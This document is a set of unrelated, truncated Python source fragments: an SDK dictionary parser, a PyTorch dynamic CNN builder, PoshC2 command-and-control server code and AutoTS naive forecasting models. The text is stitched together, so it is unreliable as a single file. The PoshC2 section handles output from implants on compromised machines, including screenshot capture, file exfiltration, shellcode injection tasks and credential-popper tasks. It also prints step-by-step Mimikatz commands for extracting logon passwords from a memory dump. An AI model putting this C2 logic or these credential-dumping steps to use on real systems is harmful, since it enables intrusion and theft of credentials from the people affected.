+ ', '.join(bad_keys))
if 'document_id' in _dict:
args['document_id'] = _dict.get('document_id')
if 'status' in _dict:
args['status'] = _dict.get('status')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a DocumentAccepted object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'document_id') and | |
# -*- coding: utf-8 -*-
import torch
from torch import nn
from support_DynamicNet import getActivationList, getPoolingList, convOutputShape
import numpy as np
from tqdm import tqdm
import matplotlib.pyplot as plt
class DynamicCNN(nn.Module):
def __init__(self, parameters, print_var = False, tracking_input_dimension = False):
super().__init__()
self.print_var = print_var
self.tracking_input_dimension = tracking_input_dimension
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Parameters recovery and check
# Set device for the training/execution
if("device" in parameters.keys()): self.device = parameters["device"]
else: self.device = device = torch.device("cpu")
# Set the number of layers for convolutional part
if("layers_cnn" in parameters.keys()):
layers_cnn = int(parameters["layers_cnn"]) #0
if(print_var): print("Layer CNN: {}".format(layers_cnn))
else:
layers_cnn = 0;
if(print_var): print("Layer CNN: {}".format(layers_cnn))
# raise Exception("No \"layers_cnn\" key inside the paramters dictionary")
# Set the number of layers for linear part
if("layers_ff" in parameters.keys()):
layers_ff = int(parameters["layers_ff"]) #1
if(print_var): print("Layer Linear: {}".format(layers_ff))
else:
layers_ff = 0
if(print_var): print("Layer Linear: {}".format(layers_ff))
# raise Exception("No \"layers_ff\" key inside the paramters dictionary")
if(layers_cnn == 0 and layers_ff == 0): raise Exception("Both \"layers_cnn\" and \"layers_ff\" are set to 0. You must have at least one layer.")
self.layers_cnn, self.layers_ff = layers_cnn, layers_ff
# Set activation functions for each layer
act = getActivationList()
if("activation_list" in parameters.keys()):
activation_list = parameters["activation_list"]
# Check activation list length (N.B the +1 is added because there is the flatten layer between the cnn and the feed-forward part)
if(len(activation_list) != layers_cnn + layers_ff + 1): raise Exception("wrong number of elements in activation_list")
# Create the activation list of the two part of the network
activation_list_cnn = activation_list[0:layers_cnn]
activation_list_ff = activation_list[(layers_cnn + 1):]
activation_flatten = activation_list[layers_cnn]
if(print_var): print("Activation CNN: {}\nActivation Linear: {}\nActivation Flatten: {}".format(activation_list_cnn, activation_list_ff, activation_flatten))
else:
raise Exception("No \"activation_list\" key inside the paramters dictionary")
if(layers_cnn != 0):
# Set kernel list
if("kernel_list" in parameters.keys() and layers_cnn != 0):
kernel_list = convertTupleElementToInt(parameters["kernel_list"])
# Check kernel list length
if(len(kernel_list) != layers_cnn): raise Exception("Wrong number of elements in kernel_list")
if(print_var): print("Kernels: {}".format(kernel_list))
else:
if(print_var): print("Kernels: {}".format(kernel_list))
# raise Exception("No \"kernel_list\" key inside the paramters dictionary")
# Set filter list
if("filters_list" in parameters.keys() and layers_cnn != 0):
filters_list = convertTupleElementToInt(parameters["filters_list"])
# Check filter list length
if(len(filters_list) != layers_cnn): raise Exception("Wrong number of elements in filters_list")
if(print_var): print("Filters/Channels: {}".format(filters_list))
else:
raise Exception("No \"filters_list\" key inside the paramters dictionary")
# Set stride list
if("stride_list" in parameters.keys() and layers_cnn != 0):
stride_list = convertTupleElementToInt(parameters["stride_list"])
# Check stride list length
if(len(stride_list) != layers_cnn): raise Exception("Wrong number of elements in stride_list")
if(print_var): print("Stride List: {}".format(stride_list))
else:
# If no stride provided create a vector to set every stride to defualt value of conv2D
stride_list = np.ones(layers_cnn).astype(int)
if(print_var): print("Stride List: {}".format(stride_list))
# Set padding list
if("padding_list" in parameters.keys() and layers_cnn != 0):
padding_list = convertTupleElementToInt(parameters["padding_list"])
# Check padding list length
if(len(padding_list) != layers_cnn): raise Exception("Wrong number of elements in padding_list")
if(print_var): print("Padding List: {}".format(padding_list))
else:
# If no padding provided create a vector to set every pad to defualt value of conv2D
padding_list = np.zeros(layers_cnn).astype(int)
if(print_var): print("Padding List: {}".format(padding_list))
# Set pooling list
if("pooling_list" in parameters.keys() and layers_cnn != 0):
pooling_list = parameters["pooling_list"]
# Check pooling length
if(len(pooling_list) != layers_cnn): raise Exception("Wrong number of elements in pooling_list")
if(print_var): print("Pooling List: {}".format(pooling_list))
else:
# If no pooling provided create a vector of negative number so no pool layer will be added
pooling_list = np.ones(layers_cnn).astype(int) * -1
if(print_var): print("Pooling List: {}".format(pooling_list))
# Set groups list
if("groups_list" in parameters.keys() and layers_cnn != 0):
groups_list = parameters["groups_list"]
# Check group length
if(len(groups_list) != layers_cnn): raise Exception("Wrong number of elements in group_list")
if(print_var): print("Groups List: {}".format(groups_list))
else:
# If no groups provided create a vector of ones number so hte group will be set to its default value of 1
groups_list = np.ones(layers_cnn).astype(int)
if(print_var): print("Groups List: {}".format(groups_list))
# Set Batch Normalization list
if("CNN_normalization_list" in parameters.keys() and layers_cnn != 0):
CNN_normalization_list = parameters["CNN_normalization_list"]
# Check batch_normalization_list list length
if(len(CNN_normalization_list) != layers_cnn): raise Exception("Wrong number of elements in CNN_normalization_list")
if(print_var): print("CNN Normalization: {}".format(CNN_normalization_list))
else:
# If no Batch was provided create a vector of negative number so no Batch layer will be added
CNN_normalization_list = np.ones(layers_cnn).astype(int) * -1
CNN_normalization_list = CNN_normalization_list > 100
if(print_var): print("CNN Normalization: {}".format(CNN_normalization_list))
# Set dropout list
if("dropout_list" in parameters.keys()):
dropout_list = parameters["dropout_list"]
# Check dropout list length
if(len(dropout_list) != layers_cnn + layers_ff + 1): raise Exception("Wrong number of elements in dropout_list")
dropout_list_cnn = dropout_list[0:layers_cnn]
dropout_list_ff = dropout_list[(layers_cnn + 1):]
dropout_flatten = dropout_list[layers_cnn]
if(print_var): print("Dropout List: {}".format(dropout_list))
else:
# If no dropout was provided create a vector of negative number so no dropout layer will be added
dropout_list = np.ones(layers_cnn + layers_ff + 1).astype(int) * -1
dropout_list_cnn = dropout_list[0:layers_cnn]
dropout_list_ff = dropout_list[(layers_cnn + 1):]
dropout_flatten = dropout_list[layers_cnn]
if(print_var): print("Dropout List: {}".format(dropout_list))
# Set bias list
if("bias_list" in parameters.keys()):
bias_list = parameters["bias_list"]
# Check bias list length
if(len(bias_list) != layers_cnn + layers_ff + 1): raise Exception("Wrong number of elements in bias_list")
bias_list_cnn = bias_list[0:layers_cnn]
bias_list_ff = bias_list[(layers_cnn + 1):]
bias_list_flatten = bias_list[layers_cnn]
if(print_var): print("Bias List: {}".format(bias_list))
else:
# If no bias was provided create a vector of negative number so no bias will be added
bias_list = np.ones(layers_cnn + layers_ff + 1).astype(int) * -1
bias_list = bias_list < 1000
bias_list_cnn = bias_list[0:layers_cnn]
bias_list_ff = bias_list[(layers_cnn + 1):]
bias_list_flatten = bias_list[layers_cnn]
if(print_var): print("Bias List: {}".format(bias_list))
# Set neuron list
if("neurons_list" in parameters.keys()):
neurons_list = parameters["neurons_list"]
# Check activation list length
if(len(neurons_list) != layers_ff): raise Exception("Wrong number of elements in neurons_list")
if(layers_ff != 1): neurons_list = convertArrayInTupleList(neurons_list)
if(print_var): print("Neurons List: {}".format(neurons_list))
else:
# raise Exception("No \"Neurons_list\" key inside the paramters dictionary")
neurons_list = []
if(print_var): print("Neurons List: {}".format(neurons_list))
# Add a empty line
if(print_var): print()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# CNN Construction
# Temporary variable used to track the change in dimensions of the input
if(layers_cnn != 0):
tmp_input = torch.ones((1, filters_list[0][0], parameters["h"], parameters["w"]))
if(tracking_input_dimension):
print("# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ")
print(tmp_input.shape, "\n")
# Temporay list to store the layer
tmp_list = []
# Construction cycle
for kernel, n_filter, stride, padding, pool, activation, normalization, p_dropout, groups, bias in zip(kernel_list, filters_list, stride_list, padding_list, pooling_list, activation_list_cnn, CNN_normalization_list, dropout_list_cnn, groups_list, bias_list_cnn):
# Create the convolutional layer and add to the list
if(groups == 1): tmp_cnn_layer = nn.Conv2d(in_channels = int(n_filter[0]), out_channels = int(n_filter[1]), kernel_size = kernel, stride = stride, padding = padding, bias = bias)
else: tmp_cnn_layer = nn.Conv2d(in_channels = int(n_filter[0]), out_channels = int(n_filter[1]), kernel_size = kernel, stride = stride, padding = padding, groups = groups, bias = bias)
tmp_list.append(tmp_cnn_layer)
# Keep track of the | |
import datetime, hashlib, base64, traceback, os, re
import poshc2.server.database.DB as DB
from poshc2.Colours import Colours
from poshc2.server.Config import ModulesDirectory, DownloadsDirectory, ReportsDirectory
from poshc2.server.Implant import Implant
from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad
from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import translate_power_status
from poshc2.Utils import randomuri
def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False):
now = datetime.datetime.now()
all_implants = DB.get_implants_all()
if not all_implants:
print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")
return
for implant in all_implants:
implantID = implant.ImplantID
RandomURI = implant.RandomURI
Hostname = implant.Hostname
encKey = implant.Key
Domain = implant.Domain
User = implant.User
implant_type = implant.Pivot
if RandomURI in uriPath and cookieVal:
DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
if implant_type == "JXA":
rawoutput = decrypt(encKey, post_data[1500:])
else:
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
cookieMsg = ""
if "-" in decCookie:
decCookie = decCookie.strip('\x00')
splt = decCookie.split("-")
if not splt[0].isdigit():
print(Colours.RED + "[!] Cookie %s is invalid" % decCookie + Colours.GREEN)
return
else:
taskId = str(int(splt[0]))
cookieMsg = splt[1]
else:
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if taskId != "99999":
executedCmd = DB.get_cmd_from_task_id(taskId)
task_owner = DB.get_task_owner(taskId)
else:
print(Colours.END)
timenow = now.strftime("%Y-%m-%d %H:%M:%S")
print(f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)" % ReportsDirectory)
print(Colours.GREEN)
print(rawoutput)
miscData = open(("%sbackground-data.txt" % ReportsDirectory), "a+")
miscData.write(rawoutput)
return
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if cookieMsg is not None and cookieMsg.lower().startswith("pwrstatusmsg"):
translate_power_status(outputParsed, RandomURI)
return
if "loadmodule" in executedCmd and len(outputParsed.split()) == 0:
print("Module loaded successfully")
DB.update_task(taskId, "Module loaded successfully")
elif "pbind-connect " in executedCmd and "PBind-Connected" in outputParsed or "PBind PBind start" in executedCmd and "PBind-Connected" in outputParsed:
outputParsed = re.search("PBind-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("PBind-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
PivotString = "C# PBind"
if "pbind-command run-exe PBind PBind start" in executedCmd:
PivotString = "C# PBind Pivot"
newImplant = Implant(implantID, PivotString, str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
if "pbind-command run-exe PBind PBind start" in executedCmd:
DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
else:
DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed:
outputParsed = re.search("FComm-Connected:.*", outputParsed)
outputParsed = outputParsed[0].replace("FComm-Connected: ", "")
Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(implantID, "C# FComm", str(Domain), str(User), str(Hostname), Arch, PID, None)
newImplant.save()
newImplant.display()
newImplant.autoruns()
DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
elif executedCmd.lower().startswith("beacon "):
new_sleep = executedCmd.replace('beacon ', '').strip()
DB.update_sleep(new_sleep, RandomURI)
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = implant.User + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
DB.update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
DB.update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
DB.update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-command run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
DB.update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-files ", "")
filename = filename.replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.replace("\\", "/")
directory, filename = filename.rsplit('/', 1)
filename = filename.rstrip('\x00')
original_filename = filename.strip()
if not original_filename:
directory = directory.rstrip('\x00')
directory = directory.replace("/", "_").replace("\\", "_").strip()
original_filename = directory
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
counter = 1
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter - 2) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter - 2)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
DB.update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%s%s' % (DownloadsDirectory, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
DB.update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]") or rawoutput.startswith("ErrorCmd"):
DB.update_task(taskId, rawoutput)
print(rawoutput)
else:
dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
dumppath = "%s%s" % (DownloadsDirectory, dumpname)
open(dumppath, 'w').write(rawoutput)
message = "Dump written to: %s" % dumppath
message = message + "\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:"
message = message + "\n $filename = '.\\%s'" % dumpname
message = message + "\n $b64 = Get-Content $filename"
message = message + "\n $bytes = [System.Convert]::FromBase64String($b64)"
message = message + "\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)"
message = message + "\n ./mimikatz.exe"
message = message + "\n sekurlsa::minidump safetydump.dmp"
message = message + "\n sekurlsa::logonpasswords"
message = message + "\nOr to just decode on Linux:"
message = message + f"\n base64 -id {dumpname} > dump.bin"
DB.update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-") or executedCmd.lower().startswith("fcomm-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
DB.update_task(taskId, outputParsed)
process_mimikatz(outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
DB.update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
def newTask(path):
all_implants = DB.get_implants_all()
commands = ""
if all_implants:
for i in all_implants:
RandomURI = i.RandomURI
Pivot = i.Pivot
EncKey = i.Key
tasks = DB.get_newtasks(RandomURI)
if RandomURI in path and tasks:
for task in tasks:
command = task[2]
user = task[3]
user_command = command
implant = DB.get_implantbyrandomuri(RandomURI)
implant_type = DB.get_implanttype(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode") or command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-command run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith("run-jxa ")) or (command.lower().startswith("clipboard-monitor ")) or (command.lower().startswith("cred-popper ")):
user_command = command[:command.index("#")]
command = "run-jxa " + command[command.index("#") + 1:]
elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file') or command.lower().startswith('fcomm-command upload-file')):
PBind = False
FComm = False
if command.lower().startswith('pbind-command upload-file'):
PBind = True
if command.lower().startswith('fcomm-command upload-file'):
FComm = True
upload_args = command \
.replace('pbind-command upload-file', '') \
.replace('fcomm-command upload-file', '') \
.replace('upload-file', '')
upload_file_args_split = upload_args.split()
if len(upload_file_args_split) < 2:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
continue
upload_file = upload_file_args_split[0]
upload_file_destination = upload_file_args_split[1]
upload_args = upload_args.replace(upload_file, '')
upload_args = upload_args.replace(upload_file_destination, '')
with open(upload_file, "rb") as f:
upload_file_bytes = f.read()
if not upload_file_bytes:
print(Colours.RED + f"Error, no bytes read from the upload file, removing task: {upload_file}" + Colours.GREEN)
DB.del_newtasks(str(task[0]))
continue
upload_file_bytes_b64 = base64.b64encode(upload_file_bytes).decode("utf-8")
if | |
"""
Naives and Others Requiring No Additional Packages Beyond Numpy and Pandas
"""
from math import ceil
import warnings
import random
import datetime
import numpy as np
import pandas as pd
from autots.models.base import ModelObject, PredictionObject
from autots.tools import seasonal_int
from autots.tools.probabilistic import Point_to_Probability, historic_quantile
# optional requirement
try:
from scipy.spatial.distance import cdist
except Exception:
pass
class ZeroesNaive(ModelObject):
"""Naive forecasting predicting a dataframe of zeroes (0's)
Args:
name (str): String to identify class
frequency (str): String alias of datetime index frequency or else 'infer'
prediction_interval (float): Confidence interval for probabilistic forecast
"""
def __init__(
self,
name: str = "ZeroesNaive",
frequency: str = 'infer',
prediction_interval: float = 0.9,
holiday_country: str = 'US',
random_seed: int = 2020,
verbose: int = 0,
**kwargs
):
ModelObject.__init__(
self,
name,
frequency,
prediction_interval,
holiday_country=holiday_country,
random_seed=random_seed,
verbose=verbose,
)
def fit(self, df, future_regressor=None):
"""Train algorithm given data supplied
Args:
df (pandas.DataFrame): Datetime Indexed
"""
df = self.basic_profile(df)
self.fit_runtime = datetime.datetime.now() - self.startTime
return self
def predict(
self, forecast_length: int, future_regressor=None, just_point_forecast=False
):
"""Generates forecast data immediately following dates of index supplied to .fit()
Args:
forecast_length (int): Number of periods of data to forecast ahead
regressor (numpy.Array): additional regressor, not used
just_point_forecast (bool): If True, return a pandas.DataFrame of just point forecasts
Returns:
Either a PredictionObject of forecasts and metadata, or
if just_point_forecast == True, a dataframe of point forecasts
"""
predictStartTime = datetime.datetime.now()
df = pd.DataFrame(
np.zeros((forecast_length, (self.train_shape[1]))),
columns=self.column_names,
index=self.create_forecast_index(forecast_length=forecast_length),
)
if just_point_forecast:
return df
else:
predict_runtime = datetime.datetime.now() - predictStartTime
prediction = PredictionObject(
model_name=self.name,
forecast_length=forecast_length,
forecast_index=df.index,
forecast_columns=df.columns,
lower_forecast=df,
forecast=df,
upper_forecast=df,
prediction_interval=self.prediction_interval,
predict_runtime=predict_runtime,
fit_runtime=self.fit_runtime,
model_parameters=self.get_params(),
)
return prediction
def get_new_params(self, method: str = 'random'):
"""Returns dict of new parameters for parameter tuning"""
return {}
def get_params(self):
"""Return dict of current parameters"""
return {}
class LastValueNaive(ModelObject):
"""Naive forecasting predicting a dataframe of the last series value
Args:
name (str): String to identify class
frequency (str): String alias of datetime index frequency or else 'infer'
prediction_interval (float): Confidence interval for probabilistic forecast
"""
def __init__(
self,
name: str = "LastValueNaive",
frequency: str = 'infer',
prediction_interval: float = 0.9,
holiday_country: str = 'US',
random_seed: int = 2020,
**kwargs
):
ModelObject.__init__(
self,
name,
frequency,
prediction_interval,
holiday_country=holiday_country,
random_seed=random_seed,
)
def fit(self, df, future_regressor=None):
"""Train algorithm given data supplied
Args:
df (pandas.DataFrame): Datetime Indexed
"""
df = self.basic_profile(df)
self.last_values = df.tail(1).to_numpy()
# self.df_train = df
self.lower, self.upper = historic_quantile(
df, prediction_interval=self.prediction_interval
)
self.fit_runtime = datetime.datetime.now() - self.startTime
return self
def predict(
self, forecast_length: int, future_regressor=None, just_point_forecast=False
):
"""Generates forecast data immediately following dates of index supplied to .fit()
Args:
forecast_length (int): Number of periods of data to forecast ahead
regressor (numpy.Array): additional regressor, not used
just_point_forecast (bool): If True, return a pandas.DataFrame of just point forecasts
Returns:
Either a PredictionObject of forecasts and metadata, or
if just_point_forecast == True, a dataframe of point forecasts
"""
predictStartTime = datetime.datetime.now()
df = pd.DataFrame(
np.tile(self.last_values, (forecast_length, 1)),
columns=self.column_names,
index=self.create_forecast_index(forecast_length=forecast_length),
)
if just_point_forecast:
return df
else:
# upper_forecast, lower_forecast = Point_to_Probability(self.df_train, df, prediction_interval = self.prediction_interval, method = 'historic_quantile')
upper_forecast = df.astype(float) + (self.upper * 0.8)
lower_forecast = df.astype(float) - (self.lower * 0.8)
predict_runtime = datetime.datetime.now() - predictStartTime
prediction = PredictionObject(
model_name=self.name,
forecast_length=forecast_length,
forecast_index=df.index,
forecast_columns=df.columns,
lower_forecast=lower_forecast,
forecast=df,
upper_forecast=upper_forecast,
prediction_interval=self.prediction_interval,
predict_runtime=predict_runtime,
fit_runtime=self.fit_runtime,
model_parameters=self.get_params(),
)
return prediction
def get_new_params(self, method: str = 'random'):
"""Returns dict of new parameters for parameter tuning"""
return {}
def get_params(self):
"""Return dict of current parameters"""
return {}
class AverageValueNaive(ModelObject):
"""Naive forecasting predicting a dataframe of the series' median values
Args:
name (str): String to identify class
frequency (str): String alias of datetime index frequency or else 'infer'
prediction_interval (float): Confidence interval for probabilistic forecast
"""
def __init__(
self,
name: str = "AverageValueNaive",
frequency: str = 'infer',
prediction_interval: float = 0.9,
holiday_country: str = 'US',
random_seed: int = 2020,
verbose: int = 0,
method: str = 'Median',
**kwargs
):
ModelObject.__init__(
self,
name,
frequency,
prediction_interval,
holiday_country=holiday_country,
random_seed=random_seed,
verbose=verbose,
)
self.method = method
def fit(self, df, future_regressor=None):
"""Train algorithm given data supplied.
Args:
df (pandas.DataFrame): Datetime Indexed
"""
df = self.basic_profile(df)
method = str(self.method).lower()
if method == 'median':
self.average_values = df.median(axis=0).to_numpy()
elif method == 'mean':
self.average_values = df.mean(axis=0).to_numpy()
elif method == 'mode':
self.average_values = (
df.mode(axis=0).iloc[0].fillna(df.median(axis=0)).to_numpy()
)
elif method == "midhinge":
results = df.to_numpy()
q1 = np.nanquantile(results, q=0.25, axis=0)
q2 = np.nanquantile(results, q=0.75, axis=0)
self.average_values = (q1 + q2) / 2
elif method in ["weighted_mean", "exp_weighted_mean"]:
weights = pd.to_numeric(df.index)
weights = weights - weights.min()
if method == "exp_weighted_mean":
weights = (weights / weights[weights != 0].min()) ** 2
self.average_values = np.average(df.to_numpy(), axis=0, weights=weights)
self.fit_runtime = datetime.datetime.now() - self.startTime
self.lower, self.upper = historic_quantile(
df, prediction_interval=self.prediction_interval
)
return self
def predict(
self, forecast_length: int, future_regressor=None, just_point_forecast=False
):
"""Generates forecast data immediately following dates of index supplied to .fit()
Args:
forecast_length (int): Number of periods of data to forecast ahead
regressor (numpy.Array): additional regressor, not used
just_point_forecast (bool): If True, return a pandas.DataFrame of just point forecasts
Returns:
Either a PredictionObject of forecasts and metadata, or
if just_point_forecast == True, a dataframe of point forecasts
"""
predictStartTime = datetime.datetime.now()
df = pd.DataFrame(
np.tile(self.average_values, (forecast_length, 1)),
columns=self.column_names,
index=self.create_forecast_index(forecast_length=forecast_length),
)
if just_point_forecast:
return df
else:
upper_forecast = df.astype(float) + self.upper
lower_forecast = df.astype(float) - self.lower
predict_runtime = datetime.datetime.now() - predictStartTime
prediction = PredictionObject(
model_name=self.name,
forecast_length=forecast_length,
forecast_index=df.index,
forecast_columns=df.columns,
lower_forecast=lower_forecast,
forecast=df,
upper_forecast=upper_forecast,
prediction_interval=self.prediction_interval,
predict_runtime=predict_runtime,
fit_runtime=self.fit_runtime,
model_parameters=self.get_params(),
)
return prediction
def get_new_params(self, method: str = 'random'):
"""Returns dict of new parameters for parameter tuning"""
method_choice = random.choices(
[
"Mean",
"Median",
"Mode",
"Midhinge",
"Weighted_Mean",
"Exp_Weighted_Mean",
],
[0.3, 0.3, 0.01, 0.1, 0.4, 0.1],
)[0]
return {'method': method_choice}
def get_params(self):
"""Return dict of current parameters."""
return {'method': self.method}
class SeasonalNaive(ModelObject):
"""Naive forecasting predicting a dataframe with seasonal (lag) forecasts.
Concerto No. 2 in G minor, Op. 8, RV 315
Args:
name (str): String to identify class
frequency (str): String alias of datetime index frequency or else 'infer'
prediction_interval (float): Confidence interval for probabilistic forecast
method (str): Either 'LastValue' (use last value of lag n) or 'Mean' (avg of all lag n)
lag_1 (int): The lag of the seasonality, should int > 1.
lag_2 (int): Optional second lag of seasonality which is averaged with first lag to produce forecast.
"""
def __init__(
self,
name: str = "SeasonalNaive",
frequency: str = 'infer',
prediction_interval: float = 0.9,
holiday_country: str = 'US',
random_seed: int = 2020,
verbose: int = 0,
lag_1: int = 7,
lag_2: int = None,
method: str = 'LastValue',
**kwargs
):
ModelObject.__init__(
self,
name,
frequency,
prediction_interval,
holiday_country=holiday_country,
random_seed=random_seed,
verbose=verbose,
)
self.lag_1 = abs(int(lag_1))
self.lag_2 = lag_2
if str(self.lag_2).isdigit():
self.lag_2 = abs(int(self.lag_2))
if str(self.lag_2) == str(self.lag_1):
self.lag_2 = 1
self.method = method
def fit(self, df, future_regressor=None):
"""Train algorithm given data supplied.
Args:
df (pandas.DataFrame): Datetime Indexed
"""
df = self.basic_profile(df)
self.df_train = df
df_length = self.train_shape[0]
self.tile_values_lag_2 = None
if self.method in ['Mean', 'Median']:
tile_index = np.tile(
np.arange(self.lag_1), int(np.ceil(df_length / self.lag_1))
)
tile_index = tile_index[len(tile_index) - (df_length) :]
df.index = tile_index
if self.method == "Median":
self.tile_values_lag_1 = df.groupby(level=0, axis=0).median()
else:
self.tile_values_lag_1 = df.groupby(level=0, axis=0).mean()
if str(self.lag_2).isdigit():
if self.lag_2 == 1:
self.tile_values_lag_2 = df.tail(self.lag_2)
else:
tile_index = np.tile(
np.arange(self.lag_2), int(np.ceil(df_length / self.lag_2))
)
tile_index = tile_index[len(tile_index) - (df_length) :]
df.index = tile_index
if self.method == "Median":
self.tile_values_lag_2 = df.groupby(level=0, axis=0).median()
else:
self.tile_values_lag_2 = df.groupby(level=0, axis=0).mean()
else:
self.method == 'LastValue'
self.tile_values_lag_1 = df.tail(self.lag_1)
if str(self.lag_2).isdigit():
self.tile_values_lag_2 = df.tail(self.lag_2)
self.fit_runtime = datetime.datetime.now() - self.startTime
return self
def predict(
self,
forecast_length: int,
future_regressor=None,
just_point_forecast: bool = False,
):
"""Generate forecast data immediately following dates of .fit().
Args:
forecast_length (int): Number of periods of data to forecast ahead
regressor (numpy.Array): additional regressor, not used
just_point_forecast (bool): If True, return a pandas.DataFrame of just point forecasts
Returns:
Either a PredictionObject of forecasts and metadata, or
